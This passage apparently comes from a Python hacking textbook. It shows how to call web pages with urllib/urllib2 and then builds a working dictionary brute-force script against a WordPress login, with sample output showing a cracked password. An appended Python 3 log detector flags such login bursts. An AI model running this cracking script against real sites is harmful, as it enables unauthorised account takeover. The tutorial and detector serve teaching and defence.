Python is similar to Java, PHP, and ASP in that a web page can also be called when a program runs. Python's strength is that it can create a simple program with a few lines of code. The ability to call a web page from the application provides the capability to automate various operations. First, let's learn the process to call a web page with Python.
Figure 9-1 Python Web page Call Process
A Python application can call a web page in a simple way by using the “urllib” and “urllib2” modules. “urllib” creates POST messages in the form "key1=value1&key2=value2". In “urllib2”, you can create a “Request” object, which returns a “Response” object via a call to the web server. The step-by-step procedure is as follows.
(1) Request Object: Using the “urllib” module, you can create the HTTP header and body data. When you send a GET request, a “Request” object is not created separately; only the URL string is passed when calling the HTTP transport function. However, you must create a “Request” object when using the POST method, changing header values, or transferring a cookie.
(2) Transferring HTTP: The functions provided by “urllib2” can be used to call the URL immediately without any additional work for socket communication. The URL is passed as an argument, and a “Request” object is passed together with it if necessary. These functions support most of the communication features that a browser provides.
(3) Server PC: The URL points to a service running on an Apache web server on the server PC. The Apache web server parses the HTTP header and body and then invokes the desired service. The results are then sent back to the hacker PC formatted as an HTTP response.
(4) Response Object: The response from the web server is in HTTP protocol format. The “urllib2” module returns a “Response” object that can be used in this application.
(5) Hacker PC: You can query the return URL, HTTP status code, header information and data by using the functions that the “Response” object provides.
Hacking may require repetitive tasks, so if you use a browser to hack a web site directly, you have to click repeatedly while continuously changing the input values. However, if this process can be implemented in a program, you can succeed with only a few lines of code. Let's therefore learn how Python calls a web page through the following example.
import urllib
import urllib2

url = "http://server/wordpress/wp-login.php" #(1)
values = {'log': 'python', 'pwd': 'python1'} #(2)
headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'} #(3)
data = urllib.urlencode(values) #(4)  body becomes "log=python&pwd=python1"
request = urllib2.Request(url, data, headers) #(5)  POST because data is supplied
response = urllib2.urlopen(request) #(6)

print "#URL:%s" % response.geturl() #(7)
print "#CODE:%s" % response.getcode()
print "#INFO:%s" % response.info()
print "#DATA:%s" % response.read()
I have entered the user name and the password on the WordPress login page. I deliberately used the wrong password to obtain a simple response, which makes the analysis simple.
(1) Setting URL: Specify the access URL.
(2) Setting Data: Specify the data in key/value form.
(3) Setting Header: It is possible to set the value of an HTTP header arbitrarily. The browser type is normally filled in by the browser itself, but the hacker can specify it at will. Cookie information from the client can also be placed here.
(4) Encoding Data: Convert the values into the form used by the HTTP protocol. The data changes into the “key1=value1&key2=value2” form.
(5) Creating Request Object: The number of arguments can vary when creating the “Request” object. When you call a service with a simple URL, only the URL is bound to the argument. If you want to transfer data, place the data into the argument as well.
(6) Calling a Web Page: The “urlopen” function calls the web page by opening the communication session, and it then returns a “Response” object with the result. The “Response” object is similar to a file.
(7) Printing Result: The required values in the “Response” object are
extracted and shown on the screen.
The “urllib” and “urllib2” modules provided by Python have many features. For example, when used with the “cookielib” module, they pass a cookie value to the web server to maintain the session. This enables the application to access sites that require authentication. The application can download a file while maintaining the session and can upload the file necessary for an XSS attack.
#URL:http://server/wordpress/wp-login.php
#CODE:200
#INFO:Date: Thu, 10 Apr 2014 08:08:36 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/wordpress/
X-Frame-Options: SAMEORIGIN
Content-Length: 3925
Connection: close
Content-Type: text/html; charset=UTF-8
#DATA:<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="ko-KR">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="ko-KR">
<!--<![endif]-->
<head>
Now let's learn how to conduct a password cracking attack. Basically, WordPress does not check the number of times that a password error has occurred in its login program. A hacker can therefore execute code that repeatedly enters password information inside the application that calls the web page. First, we obtain a data dictionary that contains various passwords. To this end, the sqlmap module that you used before provides a wordlist.zip file.
Figure 9-3 wordlist.zip
After extracting wordlist.zip, you obtain “wordlist.txt”. The file can be used as a data dictionary to crack a password. It contains more than 1.2 million commonly used passwords and occupies more than 10 MB even though it stores only text.
!
! Keeper
!!
!!!
!!!!!!
!!!!!!!!!!!!!!!!!!!!
!!!!!2
!!!!lax7890
!!!!very8989
!!!111sssMMM
!!!234what
!!!666!!!
For convenience during the hacking test, let's assume that we know the ID. It is possible to find the ID through various means, such as Google. Let's then make a program that repeatedly tries to log in while reading the passwords from the wordlist.txt file one by one. We use “python” as the ID. Since the entry “python” corresponding to the password is in the second half of the wordlist.txt file, let's copy it to the front in order to obtain the results immediately.
Figure 9-5 Password Cracking Concept
To make a program that automatically submits the username and password to the web server, you should know which variables store the username and password. For this, basic knowledge of HTML and JavaScript is necessary.
Figure 9-6 HTML Code for the Login Page
If you right-click on the sign-in page, you can select the “Source View (V)” menu. The HTML code that is executed in the browser is shown above. You must know some of the HTML tags and fields. First, the “action” field of the form tag specifies the page that is called when the form is submitted. The “name” field of each input tag gives the name of the variable that stores the user input: the username is stored in the “log” variable and the password in the “pwd” variable.
Let's now create a full-fledged Python program.
import urllib
import urllib2

url = "http://server/wordpress/wp-login.php" #(1)
user_login = "python" #(2)
wordlist = open('wordlist.txt', 'r') #(3)
passwords = wordlist.readlines()

for password in passwords: #(4)
    password = password.strip()
    values = {'log': user_login, 'pwd': password}
    data = urllib.urlencode(values)
    request = urllib2.Request(url, data)
    response = urllib2.urlopen(request)
    try:
        idx = response.geturl().index('wp-admin') #(5)
    except ValueError:  # 'wp-admin' not in the returned URL: login failed
        idx = 0
    if (idx > 0): #(6)
        print "################success###########["+password+"]"
        break
    else:
        print "################failed############["+password+"]"

wordlist.close()
Since the example obtains its results by calling a web page for every entry, program execution may take a long time. If threads are used to handle the wordlist.txt file in parallel, it is possible to shorten the execution time. Since the purpose of this book is not to explain parallel programming, I will run this test as a single process.
(1) Setting URL: Specify the URL of the target web page.
(2) Setting ID: For testing, the ID is set to “python”.
(3) Opening File: Open the text file that holds the passwords used for the test.
(4) Starting Loop: Transmit the entries stored in the file one by one and find the password that matches the user name.
(5) Checking Login: Once login succeeds, WordPress redirects to the admin screen. Therefore, check whether the returned URL contains the address of the admin screen.
(6) Ending Loop: If it contains the address of the administrator screen, exit the loop. Otherwise, retry the login with the next entry.
I moved the “python” entry forward in the wordlist.txt file to make this test more convenient.
################failed############[!]
################failed############[! Keeper]
################failed############[!!]
################failed############[!!!]
################failed############[!!!!!!]
################failed############[!!!!!!!!!!!!!!!!!!!!]
################failed############[!!!!!2]
################success############[python]
Figure 9-7 Password Cracking Results
WordPress can be easily hacked with more than 20 lines of Python code. Although these attacks can easily be blocked by security devices such as web application firewalls, many sites are still vulnerable to rudimentary hacking procedures such as password cracking due to a lack of security awareness.
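As a defender's counterpart to the scripted login above, here is an added Python 3 example (not from the original page, WordPress or sqlmap) that scans Apache access-log lines for the trace this attack leaves behind: a burst of failed POSTs to wp-login.php (status 200, as the page's own output shows) from one source address, optionally followed by the 302 redirect that marks a successful login. The log lines, IP addresses, window and threshold are constructed sample values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Apache "combined" log lines (assumed, not from the original page):
# a scripted login run from 10.0.0.5 followed by one ordinary login from 192.168.1.20.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2014:08:08:36 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3925 "-" "Python-urllib/2.7"
10.0.0.5 - - [10/Apr/2014:08:08:36 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3925 "-" "Python-urllib/2.7"
10.0.0.5 - - [10/Apr/2014:08:08:37 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3925 "-" "Python-urllib/2.7"
10.0.0.5 - - [10/Apr/2014:08:08:37 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3925 "-" "Python-urllib/2.7"
10.0.0.5 - - [10/Apr/2014:08:08:38 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Python-urllib/2.7"
192.168.1.20 - - [10/Apr/2014:08:10:15 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group('ts').split()[0], '%d/%b/%Y:%H:%M:%S')
    return {'ip': m.group('ip'), 'ts': ts, 'method': m.group('method'),
            'path': m.group('path'), 'status': int(m.group('status'))}

def detect_login_bruteforce(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return {ip: {'failures': n, 'success_after': bool}} for every source IP
    that produced `threshold` failed wp-login.php POSTs inside one `window`."""
    attempts = defaultdict(list)          # ip -> [(timestamp, status), ...]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec['method'] == 'POST' and rec['path'].endswith('/wp-login.php'):
            attempts[rec['ip']].append((rec['ts'], rec['status']))
    alerts = {}
    for ip, events in attempts.items():
        events.sort()
        # A failed WordPress login re-renders the form with status 200 (as the
        # page's output shows); a successful one answers 302 towards wp-admin.
        fails = [ts for ts, status in events if status == 200]
        for i in range(len(fails) - threshold + 1):
            if fails[i + threshold - 1] - fails[i] <= window:
                success_after = any(status == 302 and ts >= fails[i + threshold - 1]
                                    for ts, status in events)
                alerts[ip] = {'failures': len(fails), 'success_after': success_after}
                break
    return alerts
```

Run over a real access log, the `success_after` flag separates a blocked guessing run from one that ended in a valid login and therefore needs a password reset and session review, not just a firewall rule.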